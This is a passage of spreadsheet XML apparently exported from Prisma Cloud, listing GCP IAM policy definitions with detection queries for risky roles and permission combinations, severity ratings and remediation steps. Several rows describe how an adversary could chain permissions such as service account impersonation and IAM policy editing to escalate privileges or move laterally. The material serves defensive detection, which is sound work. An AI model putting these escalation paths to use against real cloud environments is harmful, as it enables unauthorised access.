          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'run.services.create', 'run.routes.invoke', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3274" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3274" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3274" t="inlineStr"/>
      <c r="AD3274" t="b">
        <v>1</v>
      </c>
      <c r="AE3274" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3274" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>833d7175-b7ac-4b93-8fc1-ebb5440e7042</t>
        </is>
      </c>
      <c r="AI3274" t="inlineStr">
        <is>
          <t>833d7175-b7ac-4b93-8fc1-ebb5440e7042</t>
        </is>
      </c>
      <c r="AJ3274" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3274" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3275">
      <c r="A3275" t="inlineStr"/>
      <c r="B3275" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3275" s="2" t="inlineStr"/>
      <c r="D3275" t="inlineStr"/>
      <c r="E3275" t="inlineStr"/>
      <c r="F3275" t="inlineStr"/>
      <c r="G3275" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3275" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3275" t="inlineStr">
        <is>
          <t>GCP service accounts with 'Owner' role on folder level</t>
        </is>
      </c>
      <c r="L3275" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3275" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3275" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3275" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3275" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3275" t="inlineStr"/>
      <c r="R3275" t="inlineStr"/>
      <c r="S3275" t="inlineStr"/>
      <c r="T3275" t="b">
        <v>0</v>
      </c>
      <c r="U3275" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3275" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3275" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Owner' on folder level that is defined as risky role. Ensure that the service accounts in your GCP environment don't have a risky 'Owner' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3275" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant folder
 3. Navigate to the IAM service
 4. Find the binding between the service account  and the "Owner" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3275" t="inlineStr"/>
      <c r="Z3275" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and grantedby.cloud.entity.type = 'serviceAccount' and grantedby.cloud.policy.name = 'Owner' and grantedby.level.type = 'GCP Folder'</t>
        </is>
      </c>
      <c r="AA3275" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3275" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3275" t="inlineStr"/>
      <c r="AD3275" t="b">
        <v>1</v>
      </c>
      <c r="AE3275" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3275" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>29afe858-4e43-4843-aa20-be46f4524136</t>
        </is>
      </c>
      <c r="AI3275" t="inlineStr">
        <is>
          <t>29afe858-4e43-4843-aa20-be46f4524136</t>
        </is>
      </c>
      <c r="AJ3275" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3275" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3276">
      <c r="A3276" t="inlineStr"/>
      <c r="B3276" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3276" s="2" t="inlineStr"/>
      <c r="D3276" t="inlineStr"/>
      <c r="E3276" t="inlineStr"/>
      <c r="F3276" t="inlineStr"/>
      <c r="G3276" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3276" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3276" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Permissions to Edit IAM Policy for Service Accounts Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3276" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3276" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3276" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3276" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3276" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3276" t="inlineStr"/>
      <c r="R3276" t="inlineStr"/>
      <c r="S3276" t="inlineStr"/>
      <c r="T3276" t="b">
        <v>1</v>
      </c>
      <c r="U3276" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3276" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3276" t="inlineStr">
        <is>
          <t>An adversary able to edit Service Accounts' IAM Policies could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3276" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y327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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name = 'iam.serviceAccounts.setIamPolicy'</t>
        </is>
      </c>
      <c r="AA3276" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3276" t="inlineStr">
        <is>
          <t>2024-06-10 06:17:24</t>
        </is>
      </c>
      <c r="AC3276" t="inlineStr"/>
      <c r="AD3276" t="b">
        <v>1</v>
      </c>
      <c r="AE3276" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3276" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>c9a6a88e-4024-4241-9182-335d4812bba8</t>
        </is>
      </c>
      <c r="AI3276" t="inlineStr">
        <is>
          <t>c9a6a88e-4024-4241-9182-335d4812bba8</t>
        </is>
      </c>
      <c r="AJ3276" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3276" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3277">
      <c r="A3277" t="inlineStr"/>
      <c r="B3277" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3277" s="2" t="inlineStr"/>
      <c r="D3277" t="inlineStr"/>
      <c r="E3277" t="inlineStr"/>
      <c r="F3277" t="inlineStr"/>
      <c r="G3277" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3277" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3277" t="inlineStr">
        <is>
          <t>GCP users with permissions to deploy new resources</t>
        </is>
      </c>
      <c r="L3277" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3277" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3277" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3277" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3277" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3277" t="inlineStr"/>
      <c r="R3277" t="inlineStr"/>
      <c r="S3277" t="inlineStr"/>
      <c r="T3277" t="b">
        <v>0</v>
      </c>
      <c r="U3277" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3277" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3277" t="inlineStr">
        <is>
          <t>A GCP user with this permission can deploy all these types of resources - the full list of resources (https://cloud.google.com/deployment-manager/docs/configuration/supported-resource-types)</t>
        </is>
      </c>
      <c r="X3277" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization/folder/project
 3. Navigate to the IAM service
 4. Find the binding between the user  and the role with "deploy new resources" permissions
 5. Remove the binding
 6. Create a new binding with a privileged predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y3277" t="inlineStr"/>
      <c r="Z3277" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and action.name = 'deploymentmanager.deployments.create'</t>
        </is>
      </c>
      <c r="AA3277" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3277" t="inlineStr">
        <is>
          <t>2024-10-30 16:43:02</t>
        </is>
      </c>
      <c r="AC3277" t="inlineStr"/>
      <c r="AD3277" t="b">
        <v>1</v>
      </c>
      <c r="AE3277" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3277" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>4ed4f5d8-aa5a-4bb9-a91f-5684ac80ad57</t>
        </is>
      </c>
      <c r="AI3277" t="inlineStr">
        <is>
          <t>4ed4f5d8-aa5a-4bb9-a91f-5684ac80ad57</t>
        </is>
      </c>
      <c r="AJ3277" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3277" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3278">
      <c r="A3278" t="inlineStr"/>
      <c r="B3278" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3278" s="2" t="inlineStr"/>
      <c r="D3278" t="inlineStr"/>
      <c r="E3278" t="inlineStr"/>
      <c r="F3278" t="inlineStr"/>
      <c r="G3278" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3278" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3278" t="inlineStr">
        <is>
          <t>GCP service accounts with 'Editor' role on org level</t>
        </is>
      </c>
      <c r="L3278" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3278" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3278" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3278" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3278" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3278" t="inlineStr"/>
      <c r="R3278" t="inlineStr"/>
      <c r="S3278" t="inlineStr"/>
      <c r="T3278" t="b">
        <v>0</v>
      </c>
      <c r="U3278" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3278" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3278" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Editor' on organization level that is defined as risky role. Ensure that the service accounts in your GCP environment don't have a risky 'Editor' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3278" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization
 3. Navigate to the IAM service
 4. Find the binding between the service account  and the "Editor" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3278" t="inlineStr"/>
      <c r="Z3278" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and grantedby.cloud.entity.type = 'serviceAccount' and grantedby.cloud.policy.name = 'Editor' and grantedby.level.type = 'GCP Organization'</t>
        </is>
      </c>
      <c r="AA3278" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3278" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3278" t="inlineStr"/>
      <c r="AD3278" t="b">
        <v>1</v>
      </c>
      <c r="AE3278" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3278" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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8" t="inlineStr">
        <is>
          <t>9226d312-f44b-42c6-bc68-c2ba3ab0ea92</t>
        </is>
      </c>
      <c r="AI3278" t="inlineStr">
        <is>
          <t>9226d312-f44b-42c6-bc68-c2ba3ab0ea92</t>
        </is>
      </c>
      <c r="AJ3278" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3278" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3279">
      <c r="A3279" t="inlineStr"/>
      <c r="B3279" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3279" s="2" t="inlineStr"/>
      <c r="D3279" t="inlineStr"/>
      <c r="E3279" t="inlineStr"/>
      <c r="F3279" t="inlineStr"/>
      <c r="G3279" t="b">
        <v>1</v>
      </c>
      <c r="H32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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3279" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3279" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Cloud Run Jobs IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3279" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3279" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3279" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3279" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3279" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3279" t="inlineStr"/>
      <c r="R3279" t="inlineStr"/>
      <c r="S3279" t="inlineStr"/>
      <c r="T3279" t="b">
        <v>1</v>
      </c>
      <c r="U3279" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3279" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3279" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. By editing the IAM policy for Cloud Run Jobs, in conjunction with Service Account impersonation privileges they will be able to escalate their permissions by adding edit permissions to an instance, causing it to perform attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3279" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y327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79" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'run.jobs.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3279" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3279" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3279" t="inlineStr"/>
      <c r="AD3279" t="b">
        <v>1</v>
      </c>
      <c r="AE3279" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3279" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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79" t="inlineStr">
        <is>
          <t>216370af-1caf-4bcd-b39a-db7088830995</t>
        </is>
      </c>
      <c r="AI3279" t="inlineStr">
        <is>
          <t>216370af-1caf-4bcd-b39a-db7088830995</t>
        </is>
      </c>
      <c r="AJ3279" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3279" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3280">
      <c r="A3280" t="inlineStr"/>
      <c r="B3280" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3280" s="2" t="inlineStr"/>
      <c r="D3280" t="inlineStr"/>
      <c r="E3280" t="inlineStr"/>
      <c r="F3280" t="inlineStr"/>
      <c r="G3280" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3280" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3280" t="inlineStr">
        <is>
          <t>GCP users with 'Editor' role on org level</t>
        </is>
      </c>
      <c r="L3280" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3280" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3280" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3280" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3280" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3280" t="inlineStr"/>
      <c r="R3280" t="inlineStr"/>
      <c r="S3280" t="inlineStr">
        <is>
          <t>alert-rule1</t>
        </is>
      </c>
      <c r="T3280" t="b">
        <v>0</v>
      </c>
      <c r="U3280" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3280" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3280" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Editor' on organization level that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Editor' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3280" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization
 3. Navigate to the IAM service
 4. Find the binding between the user  and the "Editor" role
 5. Remove the binding
 6. Create a new binding with a least privileged predefined or custom role, if necessary.</t>
        </is>
      </c>
      <c r="Y3280" t="inlineStr"/>
      <c r="Z3280" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.policy.name = 'Editor' and grantedby.level.type = 'GCP Organization'</t>
        </is>
      </c>
      <c r="AA3280" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3280" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3280" t="inlineStr"/>
      <c r="AD3280" t="b">
        <v>1</v>
      </c>
      <c r="AE3280" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3280" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>ed8823bb-d18b-4ad1-beb7-2aa082ad6d92</t>
        </is>
      </c>
      <c r="AI3280" t="inlineStr">
        <is>
          <t>ed8823bb-d18b-4ad1-beb7-2aa082ad6d92</t>
        </is>
      </c>
      <c r="AJ3280" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3280" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3281">
      <c r="A3281" t="inlineStr"/>
      <c r="B3281" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3281" s="2" t="inlineStr"/>
      <c r="D3281" t="inlineStr"/>
      <c r="E3281" t="inlineStr"/>
      <c r="F3281" t="inlineStr"/>
      <c r="G3281" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3281" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3281" t="inlineStr">
        <is>
          <t>GCP Lateral Access Expansion by Making Cloud Run Publicly Executable</t>
        </is>
      </c>
      <c r="L3281" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING</t>
        </is>
      </c>
      <c r="M3281" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3281" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3281" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3281" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3281" t="inlineStr"/>
      <c r="R3281" t="inlineStr"/>
      <c r="S3281" t="inlineStr"/>
      <c r="T3281" t="b">
        <v>1</v>
      </c>
      <c r="U3281" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3281" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3281" t="inlineStr">
        <is>
          <t>Cloud Run compute instances often attached with a service account. Adversaries with the above permissions can update cloud run instance code and public execution permissions, potentially use the service account attached to the run instance, which gives them the ability to move laterally between different resources in the environment, on behalf of the cloud run.</t>
        </is>
      </c>
      <c r="X3281" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the IAM service.
 3 Find the binding between the user and the role
 4. Find the role used by the service account.
 6 Remove binding with the role with risky permissions.
 7 Create a new binding with predefined or custom role without risky permissions, if necessary.</t>
        </is>
      </c>
      <c r="Y328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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND action.name contains all('run.services.setIamPolicy', 'iam.serviceAccounts.actAs') AND grantedby.cloud.policy.type != 'GCP Basic Role'</t>
        </is>
      </c>
      <c r="AA3281" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3281" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3281" t="inlineStr"/>
      <c r="AD3281" t="b">
        <v>1</v>
      </c>
      <c r="AE3281" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3281" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>8783eae9-6ef2-493a-ba92-104e33504976</t>
        </is>
      </c>
      <c r="AI3281" t="inlineStr">
        <is>
          <t>8783eae9-6ef2-493a-ba92-104e33504976</t>
        </is>
      </c>
      <c r="AJ3281" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3281" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3282">
      <c r="A3282" t="inlineStr"/>
      <c r="B3282" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3282" s="2" t="inlineStr"/>
      <c r="D3282" t="inlineStr"/>
      <c r="E3282" t="inlineStr"/>
      <c r="F3282" t="inlineStr"/>
      <c r="G3282" t="b">
        <v>1</v>
      </c>
      <c r="H328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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3282" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3282" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Cloud Function IAM Policy Edit Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3282" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3282" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3282" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3282" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3282" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3282" t="inlineStr"/>
      <c r="R3282" t="inlineStr"/>
      <c r="S3282" t="inlineStr"/>
      <c r="T3282" t="b">
        <v>1</v>
      </c>
      <c r="U3282" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3282" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3282" t="inlineStr">
        <is>
          <t>An adversary able to edit the IAM policy for Cloud Function instances,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82" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y328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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'cloudfunctions.functions.setIamPolicy', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3282" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3282" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3282" t="inlineStr"/>
      <c r="AD3282" t="b">
        <v>1</v>
      </c>
      <c r="AE3282" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3282" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG328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2" t="inlineStr">
        <is>
          <t>cdb9aa21-d636-4dcb-ac46-58ac08d9490f</t>
        </is>
      </c>
      <c r="AI3282" t="inlineStr">
        <is>
          <t>cdb9aa21-d636-4dcb-ac46-58ac08d9490f</t>
        </is>
      </c>
      <c r="AJ3282" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3282" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3283">
      <c r="A3283" t="inlineStr"/>
      <c r="B3283" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3283" s="2" t="inlineStr"/>
      <c r="D3283" t="inlineStr"/>
      <c r="E3283" t="inlineStr"/>
      <c r="F3283" t="inlineStr"/>
      <c r="G3283" t="b">
        <v>1</v>
      </c>
      <c r="H328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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3283" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3283" t="inlineStr">
        <is>
          <t>GCP Groups and Service Accounts with IAM Data Write permissions are unused for 90 days</t>
        </is>
      </c>
      <c r="L3283" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3283" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3283" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3283" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3283" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3283" t="inlineStr"/>
      <c r="R3283" t="inlineStr"/>
      <c r="S3283" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3283" t="b">
        <v>0</v>
      </c>
      <c r="U3283" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3283" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3283" t="inlineStr">
        <is>
          <t>This policy identifies GCP Groups and Service Accounts with Stale IAM Effective Data Write Permissions.
Risk of Unused Data Write Permissions:
Unused GCP groups and service accounts with IAM effective Data Write permissions for 90 days pose a significant security threat because:
Unsecured Access Point: These accounts act like forgotten open doors with high-level access. If compromised, attackers can directly modify or delete sensitive data stored in Cloud Storage buckets, BigQuery datasets, or other GCP services. This could lead to severe disruption, data breaches, or financial losses.
Elevated Attack Potential: Data Write permissions grant attackers the ability to manipulate core information. They could tamper with databases, alter financial records, or corrupt other critical data, leading to significant consequences.
Mitigating the Risk:
Regular Review and Removal: Proactively identify and remove unused GCP groups and service accounts with any level of IAM effective Data Write permissions (Read or Write) on a regular basis.
